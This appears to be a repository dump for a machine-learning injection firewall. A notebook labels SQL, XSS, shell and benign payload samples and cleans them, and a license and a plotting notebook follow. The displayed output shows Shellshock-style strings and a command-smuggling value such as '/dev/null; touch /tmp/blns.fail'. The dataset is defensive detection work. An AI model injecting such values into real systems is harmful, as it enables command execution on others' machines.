238 |        "      <td>'+++ATH0\\n</td>\n",
239 |        "      <td>1</td>\n",
240 |        "      <td>SHELL</td>\n",
241 |        "    </tr>\n",
242 |        "    <tr>\n",
243 |        "      <th>4</th>\n",
244 |        "      <td>/dev/null; touch /tmp/blns.fail ; echo\\n</td>\n",
245 |        "      <td>1</td>\n",
246 |        "      <td>SHELL</td>\n",
247 |        "    </tr>\n",
248 |        "  </tbody>\n",
249 |        "</table>\n",
250 |        "</div>"
251 |       ],
252 |       "text/plain": [
253 |        "                                             payload  is_malicious  \\\n",
254 |        "0     () { 0; }; touch /tmp/blns.shellshock1.fail;\\n             1   \n",
255 |        "1  () { _; } >_[$($())] { touch /tmp/blns.shellsh...             1   \n",
256 |        "2                             <<< %s(un='%s') = %u\\n             1   \n",
257 |        "3                                         '+++ATH0\\n             1   \n",
258 |        "4           /dev/null; touch /tmp/blns.fail ; echo\\n             1   \n",
259 |        "\n",
260 |        "  injection_type  \n",
261 |        "0          SHELL  \n",
262 |        "1          SHELL  \n",
263 |        "2          SHELL  \n",
264 |        "3          SHELL  \n",
265 |        "4          SHELL  "
266 |       ]
267 |      },
268 |      "metadata": {},
269 |      "output_type": "display_data"
270 |     },
271 |     {
272 |      "name": "stdout",
273 |      "output_type": "stream",
274 |      "text": [
275 |       "First 5 lines of LEGAL\n"
276 |      ]
277 |     },
278 |     {
279 |      "data": {
280 |       "text/html": [
281 |        "<div>\n",
282 |        "<table border=\"1\" class=\"dataframe\">\n",
283 |        "  <thead>\n",
284 |        "    <tr style=\"text-align: right;\">\n",
285 |        "      <th></th>\n",
286 |        "      <th>payload</th>\n",
287 |        "      <th>is_malicious</th>\n",
288 |        "      <th>injection_type</th>\n",
289 |        "    </tr>\n",
290 |        "  </thead>\n",
291 |        "  <tbody>\n",
292 |        "    <tr>\n",
293 |        "      <th>0</th>\n",
294 |        "      <td>569993989\\n</td>\n",
295 |        "      <td>0</td>\n",
296 |        "      <td>LEGAL</td>\n",
297 |        "    </tr>\n",
298 |        "    <tr>\n",
299 |        "      <th>1</th>\n",
300 |        "      <td>46201\\n</td>\n",
301 |        "      <td>0</td>\n",
302 |        "      <td>LEGAL</td>\n",
303 |        "    </tr>\n",
304 |        "    <tr>\n",
305 |        "      <th>2</th>\n",
306 |        "      <td>Indianapolis\\n</td>\n",
307 |        "      <td>0</td>\n",
308 |        "      <td>LEGAL</td>\n",
309 |        "    </tr>\n",
310 |        "    <tr>\n",
311 |        "      <th>3</th>\n",
312 |        "      <td>20354328\\n</td>\n",
313 |        "      <td>0</td>\n",
314 |        "      <td>LEGAL</td>\n",
315 |        "    </tr>\n",
316 |        "    <tr>\n",
317 |        "      <th>4</th>\n",
318 |        "      <td>A8Cyj4uzrSgkGg4szKuHeI\\n</td>\n",
319 |        "      <td>0</td>\n",
320 |        "      <td>LEGAL</td>\n",
321 |        "    </tr>\n",
322 |        "  </tbody>\n",
323 |        "</table>\n",
324 |        "</div>"
325 |       ],
326 |       "text/plain": [
327 |        "                    payload  is_malicious injection_type\n",
328 |        "0               569993989\\n             0          LEGAL\n",
329 |        "1                   46201\\n             0          LEGAL\n",
330 |        "2            Indianapolis\\n             0          LEGAL\n",
331 |        "3                20354328\\n             0          LEGAL\n",
332 |        "4  A8Cyj4uzrSgkGg4szKuHeI\\n             0          LEGAL"
333 |       ]
334 |      },
335 |      "metadata": {},
336 |      "output_type": "display_data"
337 |     }
338 |    ],
339 |    "source": [
340 |     "def from_txt_to_dataframe(src_file,is_malicious,injection_type):\n",
341 |     "    \n",
342 |     "    #read file\n",
343 |     "    payloads_txt = open('data/{}.txt'.format(src_file),'r',encoding='UTF-8').readlines()\n",
344 |     "    \n",
345 |     "    #create dataframe\n",
346 |     "    payloads = pd.DataFrame(payloads_txt,columns=['payload'])\n",
347 |     "    payloads['is_malicious'] = [is_malicious]*len(payloads)\n",
348 |     "    payloads['injection_type'] = [injection_type]*len(payloads)\n",
349 |     "\n",
350 |     "    print('First 5 lines of ' + injection_type)\n",
351 |     "    display(payloads.head())\n",
352 |     "    \n",
353 |     "    return payloads\n",
354 |     "    \n",
355 |     "#concatenate all payload dataframes together\n",
356 |     "payloads = pd.DataFrame(columns=['payload','is_malicious','injection_type'])\n",
357 |     "payloads = payloads.append(from_txt_to_dataframe('SQLCollection',1,'SQL'))\n",
358 |     "payloads = payloads.append(from_txt_to_dataframe('XSSCollection',1,'XSS'))\n",
359 |     "payloads = payloads.append(from_txt_to_dataframe('ShellCollection',1,'SHELL'))\n",
360 |     "payloads = payloads.append(from_txt_to_dataframe('non-maliciousCollection',0,'LEGAL'))\n",
361 |     "payloads = payloads.reset_index(drop=True)"
362 |    ]
363 |   },
364 |   {
365 |    "cell_type": "markdown",
366 |    "metadata": {},
367 |    "source": [
368 |     "## Step2\n",
369 |     "clean the data by\n",
370 |     "- removing ending '\\n'\n",
371 |     "- removing duplicates\n",
372 |     "- removing empty data points\n",
373 |     "- removing malicious data points with length 1\n",
374 |     "- shuffle the data set"
375 |    ]
376 |   },
377 |   {
378 |    "cell_type": "code",
379 |    "execution_count": 3,
380 |    "metadata": {},
381 |    "outputs": [
382 |     {
383 |      "name": "stdout",
384 |      "output_type": "stream",
385 |      "text": [
386 |       "Empty data points removed: 1\n",
387 |       "Malicious data points of size 1 removed: 3\n",
388 |       "Duplicate data points removed: 26072\n",
389 |       "null/NaN data points removed: 3\n"
390 |      ]
391 |     }
392 |    ],
393 |    "source": [
394 |     "#Remove ending \\n and white spaces\n",
395 |     "payloads['payload'] = payloads['payload'].str.strip('\\n')\n",
396 |     "payloads['payload'] = payloads['payload'].str.strip()\n",
397 |     "\n",
398 |     "#Remove any empty data points\n",
399 |     "rows_before = len(payloads['payload'])\n",
400 |     "payloads = payloads[payloads['payload'].str.len() != 0]\n",
401 |     "print('Empty data points removed: ' + str(rows_before - len(payloads)))\n",
402 |     "\n",
403 |     "#Remove any malicious data points of size 1\n",
404 |     "rows_before = len(payloads['payload'])\n",
405 |     "payloads = payloads[(payloads['is_malicious'] == 0) | ((payloads['is_malicious'] == 1) & (payloads['payload'].str.len() > 1))]\n",
406 |     "print('Malicious data points of size 1 removed: ' + str(rows_before-len(payloads)))\n",
407 |     "\n",
408 |     "#Remove duplicates\n",
409 |     "rows_before = len(payloads['payload'])\n",
410 |     "payloads = payloads.drop_duplicates(subset='payload', keep='last')\n",
411 |     "print('Duplicate data points removed: ' + str(rows_before-len(payloads)))\n",
412 |     "\n",
413 |     "#Reformat rows that have the format b'<payload>' into <payload>\n",
414 |     "payloads['payload'] = [payload[2:-1] if payload.startswith(\"b'\") or payload.startswith('b\"') \n",
415 |     "                        else payload for payload in payloads['payload']]\n",
416 |     "\n",
417 |     "#Shuffle dataset and reset indices again\n",
418 |     "payloads = payloads.sample(frac=1).reset_index(drop=True)\n",
419 |     "payloads.index.name = 'index'\n",
420 |     "\n",
421 |     "#Remove payloads that cant be saved into .csv using pandas, e.g. they will be null/NA/NaN\n",
422 |     "payloads.to_csv('data/payloads.csv',encoding='UTF-8')\n",
423 |     "#reload dataframe from saved .csv. The dataframe will contain a few null values\n",
424 |     "payloads = pd.read_csv(\"data/payloads.csv\",index_col='index',encoding='UTF-8') \n",
425 |     "rows_before = len(payloads['payload'])\n",
426 |     "payloads = payloads[~payloads['payload'].isnull()]\n",
427 |     "print('null/NaN data points removed: ' + str(rows_before-len(payloads)))\n",
428 |     "\n",
429 |     "#Lastly, save to .csv\n",
430 |     "payloads.to_csv('data/payloads.csv',encoding='UTF-8')"
431 |    ]
432 |   }
433 |  ],
434 |  "metadata": {
435 |   "kernelspec": {
436 |    "display_name": "Python 3",
437 |    "language": "python",
438 |    "name": "python3"
439 |   },
440 |   "language_info": {
441 |    "codemirror_mode": {
442 |     "name": "ipython",
443 |     "version": 3
444 |    },
445 |    "file_extension": ".py",
446 |    "mimetype": "text/x-python",
447 |    "name": "python",
448 |    "nbconvert_exporter": "python",
449 |    "pygments_lexer": "ipython3",
450 |    "version": "3.5.3"
451 |   }
452 |  },
453 |  "nbformat": 4,
454 |  "nbformat_minor": 2
455 | }
456 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 grananqvist
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Plots_technical_background.ipynb:
--------------------------------------------------------------------------------
  1 | {
  2 |  "cells": [
  3 |   {
  4 |    "cell_type": "markdown",
  5 |    "metadata": {},
  6 |    "source": [
  7 |     "#### The code in this notebook is entirely for making example plots to use in the technical background of the report  \n",
  8 |     "### This notebook doesn't have any relation to the overall firewall project"
  9 |    ]
 10 |   },
 11 |   {
 12 |    "cell_type": "code",
 13 |    "execution_count": 4,
 14 |    "metadata": {
 15 |     "collapsed": true
 16 |    },
 17 |    "outputs": [],
 18 |    "source": [
 19 |     "import numpy as np\n",
 20 |     "import matplotlib.pyplot as plt\n",
 21 |     "from sklearn.linear_model import LinearRegression"
 22 |    ]
 23 |   },
 24 |   {
 25 |    "cell_type": "markdown",
 26 |    "metadata": {},
 27 |    "source": [
 28 |     "### Logistic regression"
 29 |    ]
 30 |   },
 31 |   {
 32 |    "cell_type": "code",
 33 |    "execution_count": 72,
 34 |    "metadata": {},
 35 |    "outputs": [
 36 |     {
 37 |      "data": {
 38 |       "image/png": "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\n/IklnL49NPafX/uzJPpswCvGhjMWL